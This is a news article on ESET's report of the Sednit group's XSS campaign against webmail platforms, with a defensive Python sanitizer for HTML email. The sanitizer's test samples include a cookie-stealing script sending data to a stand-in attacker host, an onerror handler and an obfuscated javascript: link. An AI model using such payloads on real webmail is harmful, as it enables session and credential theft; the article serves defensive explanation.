Surge in XSS Cyberattacks Targets Popular Webmail Platforms, ESET Reports
A recent report from ESET has uncovered a sophisticated cyber espionage campaign by the Russia-aligned Sednit group, targeting high-value webmail platforms through cross-site scripting (XSS) attacks.
Dubbed Operation RoundPress, the campaign exploited flaws in popular webmail software, namely Roundcube, Horde, MDaemon, and Zimbra, with a primary focus on governmental entities and defense organizations in Eastern Europe, alongside targets in Africa, Europe, and South America.
The attacks begin with spearphishing emails, often themed around Ukraine-related news, whose HTML body carries the malicious JavaScript; known and zero-day XSS vulnerabilities in the way each webmail client renders message HTML allow that script to run in the victim's webmail session.
Simply opening one of these crafted emails in a vulnerable webmail portal triggers the payload, with no link click or attachment needed, enabling the attackers to steal credentials, exfiltrate email content, contacts, and login histories, and even bypass two-factor authentication (2FA) by creating app passwords that grant persistent mailbox access.
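The class of bug RoundPress abuses is a webmail client rendering untrusted message HTML without a strict allowlist. The sanitizer below is an added example written for this article; it is not ESET's code and not the sanitizer shipped by Roundcube, Horde, MDaemon or Zimbra. The tag and attribute allowlist, the `attacker.example` host, and the sample message bodies are all constructed for illustration. It demonstrates the checks a webmail renderer needs: drop `<script>`-like elements together with their content, strip every `on*` event handler, allow only explicit URL schemes on `href`/`src` (defeating tab- and entity-obfuscated `javascript:` URLs), and re-escape all text on output.

```python
"""Allowlist-based sanitizer for HTML email bodies rendered inside a webmail UI.

Added example for this article: not ESET's code and not the sanitizer of any
webmail product named in the report. The allowlist, the attacker.example host
and the sample messages are constructed for illustration.
"""
import re
from html import escape
from html.parser import HTMLParser

# Elements a mail client legitimately needs for layout. Anything else is dropped
# (its text content is kept), which is what makes an allowlist safe by default.
ALLOWED_TAGS = {
    "p", "br", "div", "span", "b", "i", "u", "em", "strong", "a", "img",
    "ul", "ol", "li", "blockquote", "table", "tr", "td", "th", "h1", "h2", "h3",
}
# Elements whose *content* must be discarded too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript", "template"}
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
    "td": {"colspan", "rowspan"},
    "th": {"colspan", "rowspan"},
}
VOID_TAGS = {"br", "img"}
# Only explicit, known-safe schemes; "cid:" is how inline email images are referenced.
SAFE_URL = re.compile(r"^(?:https?|mailto|cid):", re.IGNORECASE)


class EmailHtmlSanitizer(HTMLParser):
    def __init__(self):
        # convert_charrefs=True decodes entities (&#9; etc.) before we see them,
        # so the scheme check runs on the value a browser would actually use.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.drop_depth = 0  # > 0 while inside <script>, <style>, <iframe>, ...

    def _safe_url(self, value):
        # Browsers ignore ASCII control characters and whitespace inside a scheme,
        # so "java\tscript:" is still javascript:. Strip them before matching.
        cleaned = re.sub(r"[\x00-\x20]", "", value or "")
        return cleaned if SAFE_URL.match(cleaned) else None

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            # Event handlers and everything off the per-tag allowlist are removed.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src"):
                value = self._safe_url(value)
                if value is None:
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag in VOID_TAGS or tag not in self.open_tags:
            return
        # Close any intermediate unclosed tags so the output stays well-formed.
        while self.open_tags:
            t = self.open_tags.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data))  # text is re-escaped, never emitted raw

    def handle_comment(self, data):
        pass  # conditional comments and the like carry no value for the reader

    def result(self):
        self.close()
        while self.open_tags:  # close whatever the sender left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_email_html(body):
    """Return a rendering-safe subset of an untrusted HTML email body."""
    s = EmailHtmlSanitizer()
    s.feed(body)
    return s.result()


if __name__ == "__main__":
    # Constructed sample bodies in the spirit of the vectors the article describes.
    for sample in (
        '<p>Quarterly update</p><script>fetch("https://attacker.example/?c="+document.cookie)</script>',
        '<img src="cid:logo" onerror="alert(document.domain)">',
        '<a href="java&#9;script:alert(1)">Open</a>',
    ):
        print(repr(sanitize_email_html(sample)))
```

The first sample loses the whole script, the second keeps the inline image but not its `onerror` handler, and the third keeps the link text but drops the obfuscated `javascript:` target. Any webmail client that can be coaxed into skipping one of these steps, for example by a parsing difference between its sanitizer and the browser, is exactly what an XSS-based campaign like RoundPress looks for.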
Webmail Popularity Fuels Cybercriminal Opportunities
Webmail services remain a cornerstone of business communication, with global email user numbers reaching 4.37 billion in 2023 and projecting to hit 4.89 billion by 2027, as per recent statistics.
Their appeal, especially among small and medium-sized businesses (SMBs), lies in affordability, flexibility, and ease of access from any internet-connected device without requiring dedicated software.
Litmus telemetry from 2022 indicates webmail as the second-most popular email reading environment at 36%, trailing only Apple Mail.
However, this widespread adoption, coupled with a false sense of inherent security due to built-in protections by market leaders, often leaves organizations complacent.
ESET’s findings reveal that this overreliance on webmail as a low-maintenance solution creates fertile ground for attackers like Sednit, who exploit unpatched vulnerabilities or develop zero-day exploits, as seen with MDaemon in Operation RoundPress.
A 2024 Forrester report further underscores the risk, noting that 22% of breaches via external attacks stem from web application exploits, including XSS and SQL Injection (SQLi), highlighting the critical need for robust cybersecurity measures.
Mitigation Strategies to Counter Webmail Threats
Despite the severity of such cyberattacks, ESET emphasizes actionable defenses that can significantly mitigate risks.
MDaemon released a patch within two weeks of ESET's notification, which shows that vendors can neutralize such threats quickly, but a patch only protects the businesses that actually install it, so updates must be applied as soon as they are released.
User awareness also matters: cybersecurity training helps employees recognize phishing that masquerades as legitimate news or urgent communications, a tactic central to RoundPress. It is not sufficient on its own, however, because the RoundPress payload fires as soon as a crafted message is rendered in a vulnerable client, so patching and hardening the webmail deployment itself remain the primary defenses.
Beyond prevention, deploying layered security solutions is vital; ESET reports that its own firewall and endpoint protection blocked data exfiltration and malicious scripts at multiple stages of these attacks.
As webmail continues to dominate business communication, organizations must shed the notion of it as a set-and-forget tool and invest in continuous maintenance, vigilant updates, and layered defenses to protect against evolving threats from determined adversaries like Sednit.